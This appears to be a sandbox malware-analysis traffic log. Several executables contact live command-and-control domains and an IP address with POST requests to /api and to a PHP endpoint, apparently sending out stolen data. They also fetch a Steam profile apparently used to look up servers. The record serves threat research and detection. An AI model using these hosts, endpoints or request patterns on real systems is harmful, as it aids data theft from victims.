                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:53 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=srk3islcb5kvdl4sdk17gebtjg; expires=Mon, 31-Mar-2025 20:03:31 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2O6g%2FPSIh2%2B%2Fz6w0N6ptA3xxSvCyh5OHBDpCa%2FA2bG3HBLh2VuGHKqYe7Ws%2BX2iil382Q4S26FhUUKkeyRhDV7nPKL0bUZq4lbAqdmsvCAC5q8Jf27MzxNw%2F1WXuXviRilA%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6c00ed2bd7e-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=49729&min_rtt=46930&rtt_var=14383&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3296&recv_bytes=603&delivery_rate=75632&cwnd=253&unsent_bytes=0&cid=2ff4518f43808684&ts=1087&x=0"
                                 • US
                                  DNS
                                  dare-curbys.biz
                                  f56e441c8f.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  dare-curbys.biz
                                  IN A
                                  Response
                                  dare-curbys.biz
                                  IN A
                                  104.21.43.156
                                  dare-curbys.biz
                                  IN A
                                  172.67.181.44
                                 • US
                                  POST
                                  https://dare-curbys.biz/api
                                  2M4078.exe
                                  Remote address:
                                  104.21.43.156:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: dare-curbys.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:53 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=9pmmod91l35ghlqg4g8u1mmnmu; expires=Mon, 31-Mar-2025 20:03:32 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fB%2B3vv%2BZklNL7Qvh8zq%2BgkEmAf%2BRUfnUweDL%2B7weg%2F1NeEsiP4ycusr4NiiJKjm3M6wdOnfkgUb%2BZLBoh58fqJgtZodXqO%2FPM6w4xY0LpPAx2kttyXtVPEaoPLbVN2Z3Mp8%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6c31d2d953b-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=48006&min_rtt=46940&rtt_var=11491&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3295&recv_bytes=603&delivery_rate=77931&cwnd=253&unsent_bytes=0&cid=b3288f99122baf2e&ts=894&x=0"
                                 • US
                                  DNS
                                  64.206.67.172.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  64.206.67.172.in-addr.arpa
                                  IN PTR
                                  Response
                                 • US
                                  DNS
                                  156.43.21.104.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  156.43.21.104.in-addr.arpa
                                  IN PTR
                                  Response
                                 • US
                                  POST
                                  https://dwell-exclaim.biz/api
                                  BhD8htX.exe
                                  Remote address:
                                  172.67.153.96:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: dwell-exclaim.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:54 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=pc6rsuh4j3arn6m8igrop1h6or; expires=Mon, 31-Mar-2025 20:03:32 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o4osCi0MPw3ZAwyjOzZvKzzHKv7OmpU%2FHguCj8YOqcs1pz1dCkY3RD8seBPqCJNmBvbaXhnjnGlgjhl6GtO6P%2BMZvQBCfoSwoM3uKs85G1s5Wl7hK8lUd0xbyJrVgholBhi2wA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6c79cb78889-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=47374&min_rtt=46958&rtt_var=10547&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3303&recv_bytes=607&delivery_rate=83870&cwnd=253&unsent_bytes=0&cid=07fc962e5cf00183&ts=599&x=0"
                                 • US
                                  DNS
                                  print-vexer.biz
                                  f56e441c8f.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  print-vexer.biz
                                  IN A
                                  Response
                                  print-vexer.biz
                                  IN A
                                  104.21.35.246
                                  print-vexer.biz
                                  IN A
                                  172.67.181.192
                                 • US
                                  POST
                                  https://print-vexer.biz/api
                                  2M4078.exe
                                  Remote address:
                                  104.21.35.246:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: print-vexer.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:54 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=2skb3m9845b04niu939f3fju1k; expires=Mon, 31-Mar-2025 20:03:33 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kwzq4JCV2eQh6Qx7cOoYXhKbRVzxsgKFPnDVfdsvE7omfl0xJ9nNId4IJOzybukU8q56NN3HBA9IYZadXDuVRyT2lN0iTzvJQNPfHEqbigf4Su81m1sdTDmzRV30xoHxBYA%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6ca2d20417d-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=58563&min_rtt=51482&rtt_var=23087&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3294&recv_bytes=603&delivery_rate=61703&cwnd=253&unsent_bytes=0&cid=a86ce4732f9231dc&ts=657&x=0"
                                • flag-us
                                  POST
                                  https://formy-spill.biz/api
                                  BhD8htX.exe
                                  Remote address:
                                  172.67.173.74:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: formy-spill.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:54 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=6gv6haa99ojcga74g561pqg5ap; expires=Mon, 31-Mar-2025 20:03:33 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zJEoMFib%2BPnX8l4GijQdIAVDw4VtNX40enwYMYU7iZm2rncZLqKGmAYOU23KiLgIKKm7kNtkS950C3Qbqprex01FHpZaLQKyZDT2UMw4XrQ2nctyNJ6sLVOIG3VH8Umbtho%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6cc1bd89413-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=56158&min_rtt=50246&rtt_var=15574&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3293&recv_bytes=603&delivery_rate=80860&cwnd=253&unsent_bytes=0&cid=e4682622ecaaa826&ts=693&x=0"
                                • flag-us
                                  DNS
                                  246.35.21.104.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  246.35.21.104.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  impend-differ.biz
                                  f56e441c8f.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  impend-differ.biz
                                  IN A
                                  Response
                                • flag-us
                                  DNS
                                  steamcommunity.com
                                  f56e441c8f.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  steamcommunity.com
                                  IN A
                                  Response
                                  steamcommunity.com
                                  IN A
                                  23.214.143.155
                                • flag-gb
                                  GET
                                  https://steamcommunity.com/profiles/76561199724331900
                                  2M4078.exe
                                  Remote address:
                                  23.214.143.155:443
                                  Request
                                  GET /profiles/76561199724331900 HTTP/1.1
                                  Connection: Keep-Alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Host: steamcommunity.com
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                  Cache-Control: no-cache
                                  Date: Fri, 06 Dec 2024 02:16:55 GMT
                                  Content-Length: 35602
                                  Connection: keep-alive
                                  Set-Cookie: sessionid=12c6100f582b03671b40059f; Path=/; Secure; SameSite=None
                                  Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                                • flag-us
                                  POST
                                  https://covery-mover.biz/api
                                  BhD8htX.exe
                                  Remote address:
                                  172.67.206.64:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: covery-mover.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:56 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=e1tmrp88kc181c1on5k4nn2n88; expires=Mon, 31-Mar-2025 20:03:34 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=47nJqZnPbJD6P1%2FjV%2Bwyr7MQeM75j2nEohf5PEeFJmZOD%2Bqq%2BGtKhNVb00KIVO6FoL69hoYisNM1mynl%2F6NHVCiS0VYi00udyuxxEyxAio4J2S1CEqepJ0IZv7K7CvLLdmwv"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6d1192b93f3-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=47869&min_rtt=47023&rtt_var=11254&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3299&recv_bytes=605&delivery_rate=82696&cwnd=253&unsent_bytes=0&cid=ff5ccf62299d4079&ts=1356&x=0"
                                • flag-us
                                  DNS
                                  marshal-zhukov.com
                                  f56e441c8f.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  marshal-zhukov.com
                                  IN A
                                  Response
                                  marshal-zhukov.com
                                  IN A
                                  172.67.160.80
                                  marshal-zhukov.com
                                  IN A
                                  104.21.82.174
                                • flag-us
                                  POST
                                  https://marshal-zhukov.com/api
                                  2M4078.exe
                                  Remote address:
                                  172.67.160.80:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: marshal-zhukov.com
                                  Response
                                  HTTP/1.1 403 Forbidden
                                  Date: Fri, 06 Dec 2024 02:16:55 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  X-Frame-Options: SAMEORIGIN
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JX1jjqG2cr4FKh0SUCfyy1bU4NVmplK%2FCkFxbDA7K3j9oziyMFaVu3vOQb882FvgIthwTg%2FWsxla8E9mY%2FYo8jSaQBMHlJz0yKoPZoWL1aqc8pwi10db%2F6rpSdl6z4TpqlsnHo0%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6d3ccd894c1-LHR
                                • flag-us
                                  POST
                                  https://marshal-zhukov.com/api
                                  2M4078.exe
                                  Remote address:
                                  172.67.160.80:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  Cookie: __cf_mw_byp=GUWXk5E5QOmHQuPkHrtObFA.HbvTp2jwlATnRULWzVg-1733451415-0.0.1.1-/api
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 53
                                  Host: marshal-zhukov.com
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:57 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=kioi8aoqnsjul4ajgqgao71agj; expires=Mon, 31-Mar-2025 20:03:35 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H9um7amWnDax1qfGbke8N4jG7mjIF2VEcSdAz5SP0cxAfwQObUukiwqUycsHK0BTZezSsbzzJLHvUksHUOybxesaT2aO2PxL4czgP4r2Awdlf12VXYXMB%2FCsHmkQVYL4cjKhkMA%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6d8787f94c1-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=61648&min_rtt=49159&rtt_var=10943&sent=13&recv=12&lost=0&retrans=0&sent_bytes=8578&recv_bytes=1075&delivery_rate=126619&cwnd=257&unsent_bytes=0&cid=3993e6105c5b5f26&ts=1709&x=0"
                                • flag-us
                                  DNS
                                  155.143.214.23.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  155.143.214.23.in-addr.arpa
                                  IN PTR
                                  Response
                                  155.143.214.23.in-addr.arpa
                                  IN PTR
                                  a23-214-143-155.deploy.static.akamaitechnologies.com
                                • flag-us
                                  DNS
                                  80.160.67.172.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  80.160.67.172.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  POST
                                  https://dare-curbys.biz/api
                                  BhD8htX.exe
                                  Remote address:
                                  104.21.43.156:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: dare-curbys.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:57 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=s0gghr7i4bitgjpujvg8hmbo0g; expires=Mon, 31-Mar-2025 20:03:35 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UFlUESRevaFl85vnUeYbIVJDT%2FmfIbvlGOr0jlSqj0B7B9XhFTR8IH17BN2bsjwkM5KWE1W%2Bq%2F9QJjESzvQzsuOosdS9%2F4b18n7wJavieMOixmAHe9Unc3281%2BzYAM%2F7VSg%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6da4b5994a1-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=47953&min_rtt=47121&rtt_var=11511&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3296&recv_bytes=603&delivery_rate=84474&cwnd=253&unsent_bytes=0&cid=46ff26f58b1c9b5e&ts=640&x=0"
                                • flag-us
                                  DNS
                                  228.249.119.40.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  228.249.119.40.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  POST
                                  https://print-vexer.biz/api
                                  BhD8htX.exe
                                  Remote address:
                                  104.21.35.246:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: print-vexer.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:57 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=tif5gjo8tc4vh76ur7l23d1qtq; expires=Mon, 31-Mar-2025 20:03:36 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=563R3RMzHTwuFve1jf6lne0m7zRrpqI9dZKRfC%2BIDFBmvBjFbG%2B5LuIPK%2FCxcHpdDSvH%2Bqql4vr%2BwigcahpAogZILVwMhJz%2FgXjfct1NT4pBlyECYPjsrY2afwOQrCSY8E0%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6dede46cd4b-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=47899&min_rtt=47278&rtt_var=11053&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3295&recv_bytes=603&delivery_rate=81601&cwnd=253&unsent_bytes=0&cid=1badd49216f6e82d&ts=389&x=0"
                                • flag-gb
                                  GET
                                  https://steamcommunity.com/profiles/76561199724331900
                                  BhD8htX.exe
                                  Remote address:
                                  23.214.143.155:443
                                  Request
                                  GET /profiles/76561199724331900 HTTP/1.1
                                  Connection: Keep-Alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Host: steamcommunity.com
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                  Cache-Control: no-cache
                                  Date: Fri, 06 Dec 2024 02:16:58 GMT
                                  Content-Length: 35602
                                  Connection: keep-alive
                                  Set-Cookie: sessionid=e881c9735643b8cd409f922b; Path=/; Secure; SameSite=None
                                  Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                                • flag-us
                                  POST
                                  https://marshal-zhukov.com/api
                                  BhD8htX.exe
                                  Remote address:
                                  172.67.160.80:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: marshal-zhukov.com
                                  Response
                                  HTTP/1.1 403 Forbidden
                                  Date: Fri, 06 Dec 2024 02:16:58 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  X-Frame-Options: SAMEORIGIN
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tb%2FinMDPU2QrBuS3wVEJKSWuop5VkheAM2VYExMMuxN6BO4FPAPqGKuk5QTzS%2BVaa2o2YbYJ9Z8DXykiAruNmfjiH%2BA8Nm2Gr8tLoHokPXJiUnaHvbG4JF0cqMQ4sj97kScU5A0%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6e58a3394d2-LHR
                                • flag-us
                                  POST
                                  https://marshal-zhukov.com/api
                                  BhD8htX.exe
                                  Remote address:
                                  172.67.160.80:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  Cookie: __cf_mw_byp=IpTVhzhKheYz9NDiNAVYbnbRkaz7D_mT6hW29Wnov8g-1733451418-0.0.1.1-/api
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 49
                                  Host: marshal-zhukov.com
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:58 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=qp2un8m74go375p7b53pg7bpb7; expires=Mon, 31-Mar-2025 20:03:37 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ft45%2B%2B9ugZvTXFr69uia7ID3PaXygZdAhlqitssK9Ipv%2FIRcRB6viWSOE79yYw1kWqAn2BOWwAHKwVgF14uS48dNzR2bhCu%2By18unSYvjbJO5DQQoO5I0iQM6oBwCnCbK%2BApYkY%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6e69adc94d2-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=51963&min_rtt=48483&rtt_var=6551&sent=13&recv=12&lost=0&retrans=0&sent_bytes=8575&recv_bytes=1071&delivery_rate=150446&cwnd=257&unsent_bytes=0&cid=46921dd0b2d0feab&ts=491&x=0"
                                • flag-ru
                                  GET
                                  http://185.215.113.206/
                                  3Z39A.exe
                                  Remote address:
                                  185.215.113.206:80
                                  Request
                                  GET / HTTP/1.1
                                  Host: 185.215.113.206
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:59 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                • flag-ru
                                  POST
                                  http://185.215.113.206/c4becf79229cb002.php
                                  3Z39A.exe
                                  Remote address:
                                  185.215.113.206:80
                                  Request
                                  POST /c4becf79229cb002.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----EGDGIEGHJEGIDGCAFBFC
                                  Host: 185.215.113.206
                                  Content-Length: 211
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:59 GMT
